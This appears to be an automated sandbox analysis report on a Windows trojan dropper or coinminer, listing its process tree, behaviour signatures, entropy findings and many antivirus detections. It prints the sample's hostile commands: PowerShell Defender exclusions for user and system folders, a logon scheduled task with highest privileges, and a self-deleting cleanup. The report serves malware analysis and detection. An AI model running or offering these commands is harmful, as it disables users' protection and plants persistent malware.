Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | Sept. 2, 2021, 5:32 p.m. | Sept. 2, 2021, 5:36 p.m. |
-
-
cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
1948-
powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
2744 -
powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
2392 -
powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\Temp'
1772 -
powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
972
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\eth.exe"
1168-
svchost32.exe C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\eth.exe"
508-
cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
3060-
schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
328
-
-
-
cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
1612-
powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
2428 -
powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
1188
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services64.exe"
2572-
svchost32.exe C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services64.exe"
2144
-
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe"
2088-
choice.exe choice /C Y /N /D Y /T 3
2692
-
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
No hosts contacted. |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
file | C:\Users\test22\AppData\Local\Temp\svchost32.exe |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
file | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\Temp' |
cmdline | cmd /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services64.exe" |
cmdline | cmd /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe" |
cmdline | cmd /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\eth.exe" |
cmdline | cmd /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit |
cmdline | C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services64.exe" |
cmdline | "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\eth.exe" |
cmdline | powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming' |
cmdline | powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22' |
cmdline | "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit |
cmdline | "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit |
cmdline | schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' |
cmdline | "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services64.exe" |
cmdline | C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\eth.exe" |
cmdline | "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe" |
cmdline | powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows' |
section | {u'size_of_data': u'0x00007000', u'virtual_address': u'0x00002000', u'entropy': 7.742984228891841, u'name': u'.text', u'virtual_size': u'0x00006e8c'} | entropy | 7.74298422889 | description | A section with a high entropy has been found | |||||||||
entropy | 0.933333333333 | description | Overall entropy of this PE file is high |
cmdline | cmd /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe" |
cmdline | cmd /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit |
cmdline | "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit |
cmdline | schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' |
cmdline | "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe" |
cmdline | cmd /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit |
cmdline | "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit |
cmdline | schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' |
file | C:\Users\test22\AppData\Local\Temp\svchost32.exe |
file | C:\Users\test22\AppData\Local\Temp\svchost32.exe |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |
Elastic | malicious (high confidence) |
DrWeb | Trojan.MulDropNET.46 |
Cynet | Malicious (score: 100) |
FireEye | Generic.mg.5c28e053a7702cad |
ALYac | Trojan.GenericKD.37505152 |
Cylance | Unsafe |
K7AntiVirus | Trojan ( 0057f9ce1 ) |
Alibaba | Malware:Win32/Dorpal.ali1000029 |
K7GW | Trojan ( 0057f9ce1 ) |
CrowdStrike | win/malicious_confidence_100% (W) |
Arcabit | Trojan.Generic.D23C4880 |
Cyren | W64/MSIL_Troj.BCG.gen!Eldorado |
Symantec | Trojan.Gen.MBT |
ESET-NOD32 | a variant of MSIL/TrojanDropper.Agent.FGN |
Paloalto | generic.ml |
Kaspersky | HEUR:Trojan.MSIL.Tasker.gen |
BitDefender | Trojan.GenericKD.37505152 |
MicroWorld-eScan | Trojan.GenericKD.37505152 |
Avast | Win64:CoinminerX-gen [Trj] |
Tencent | Msil.Trojan.Tasker.Swbg |
Ad-Aware | Trojan.GenericKD.37505152 |
Emsisoft | Trojan.GenericKD.37505152 (B) |
McAfee-GW-Edition | Artemis!Trojan |
Sophos | Mal/Generic-S |
Ikarus | Trojan-Dropper.MSIL.Agent |
eGambit | Unsafe.AI_Score_99% |
Avira | HEUR/AGEN.1143065 |
Kingsoft | Win32.Troj.Undef.(kcloud) |
Microsoft | Trojan:MSIL/AgentTesla.CHH!MTB |
GData | Win32.Malware.Guimpost.H871DA |
AhnLab-V3 | Trojan/Win.Generic.C4567184 |
McAfee | Artemis!5C28E053A770 |
VBA32 | Trojan.MSIL.Tasker |
APEX | Malicious |
SentinelOne | Static AI - Malicious PE |
MaxSecure | Trojan.Malware.300983.susgen |
Fortinet | MSIL/Agent.FGN!tr |
Webroot | W32.Coinminer.Gen |
AVG | Win64:CoinminerX-gen [Trj] |
Cybereason | malicious.b95495 |